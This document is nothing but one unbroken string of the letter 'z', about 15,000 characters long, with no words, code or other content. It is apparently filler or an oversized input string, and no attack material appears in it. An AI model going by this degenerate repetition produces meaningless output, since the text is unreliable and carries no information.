zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz